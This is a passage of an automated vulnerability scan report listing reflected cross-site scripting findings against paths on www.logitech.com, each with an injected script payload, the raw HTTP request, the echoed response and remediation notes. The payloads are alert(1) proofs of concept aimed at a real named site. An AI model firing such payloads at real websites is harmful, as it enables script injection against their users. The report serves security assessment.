User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us2ee26"><script>alert(1)</script>6841bfbfbe4/349/7393">
...[SNIP]...

1.209. http://www.logitech.com/en-us/349/7393 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f39bb</script><script>alert(1)</script>d0ecba208c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f39bb</script><script>alert(1)</script>d0ecba208c3/349/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f39bb</script><script>alert(1)</script>d0ecba208c3/349/7393' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.210. http://www.logitech.com/en-us/349/7393 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7baf1</script><script>alert(1)</script>75e1f767a3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/3497baf1</script><script>alert(1)</script>75e1f767a3a/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3497baf1</script><script>alert(1)</script>75e1f767a3a/7393' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.211. http://www.logitech.com/en-us/349/7393 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2728"><script>alert(1)</script>459434c9ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349d2728"><script>alert(1)</script>459434c9ec7/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349d2728"><script>alert(1)</script>459434c9ec7/7393">
...[SNIP]...

1.212. http://www.logitech.com/en-us/349/7393 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd82</script><script>alert(1)</script>e46a071140c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/73938bd82</script><script>alert(1)</script>e46a071140c HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/73938bd82</script><script>alert(1)</script>e46a071140c' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.213. http://www.logitech.com/en-us/349/7393 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec80"><script>alert(1)</script>03d57a6218f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/73936ec80"><script>alert(1)</script>03d57a6218f HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/73936ec80"><script>alert(1)</script>03d57a6218f">
...[SNIP]...

1.214. http://www.logitech.com/en-us/403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0a3"><script>alert(1)</script>28e2f5b7a20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-usfe0a3"><script>alert(1)</script>28e2f5b7a20/403/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usfe0a3"><script>alert(1)</script>28e2f5b7a20/403">
...[SNIP]...

1.215. http://www.logitech.com/en-us/403/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b783</script><script>alert(1)</script>be912242e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6b783</script><script>alert(1)</script>be912242e94/403/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','6b783</script><script>alert(1)</script>be912242e94/403' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.216. http://www.logitech.com/en-us/403/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c68</script><script>alert(1)</script>1a12fe97229 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/40349c68</script><script>alert(1)</script>1a12fe97229/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','40349c68</script><script>alert(1)</script>1a12fe97229' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.217. http://www.logitech.com/en-us/403/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff114"><script>alert(1)</script>8d222ec8a80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/403ff114"><script>alert(1)</script>8d222ec8a80/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="403ff114"><script>alert(1)</script>8d222ec8a80">
...[SNIP]...

1.218. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c84f1</script><script>alert(1)</script>fd42d3974fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c84f1</script><script>alert(1)</script>fd42d3974fd/403/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c84f1</script><script>alert(1)</script>fd42d3974fd/403/' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.219. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668ca"><script>alert(1)</script>a25658b7d5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us668ca"><script>alert(1)</script>a25658b7d5f/403/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us668ca"><script>alert(1)</script>a25658b7d5f/403/">
...[SNIP]...

1.220. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e31</script><script>alert(1)</script>f910518a1de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/40328e31</script><script>alert(1)</script>f910518a1de/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','40328e31</script><script>alert(1)</script>f910518a1de/' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsur
...[SNIP]...

1.221. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40dce"><script>alert(1)</script>6a1921695be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/40340dce"><script>alert(1)</script>6a1921695be/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="40340dce"><script>alert(1)</script>6a1921695be/">
...[SNIP]...

1.222. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9ce"%3b1f5403205ae was submitted in the REST URL parameter 1. This input was echoed as 7c9ce";1f5403205ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us7c9ce"%3b1f5403205ae/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us7c9ce";1f5403205ae/434/7288";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.223. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81c82</script><script>alert(1)</script>86f1d1f3dd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /81c82</script><script>alert(1)</script>86f1d1f3dd1/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','81c82</script><script>alert(1)</script>86f1d1f3dd1/434/7288' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.224. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf76"><script>alert(1)</script>d912e138453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us8cf76"><script>alert(1)</script>d912e138453/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us8cf76"><script>alert(1)</script>d912e138453/434/7288">
...[SNIP]...

1.225. http://www.logitech.com/en-us/434/7288 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c56"><script>alert(1)</script>6a0149ddc29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/43410c56"><script>alert(1)</script>6a0149ddc29/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="43410c56"><script>alert(1)</script>6a0149ddc29/7288">
...[SNIP]...

1.226. http://www.logitech.com/en-us/434/7288 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80972</script><script>alert(1)</script>fdf704983fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/43480972</script><script>alert(1)</script>fdf704983fa/7288 HTTP/1.1
Host: www.logitech.com
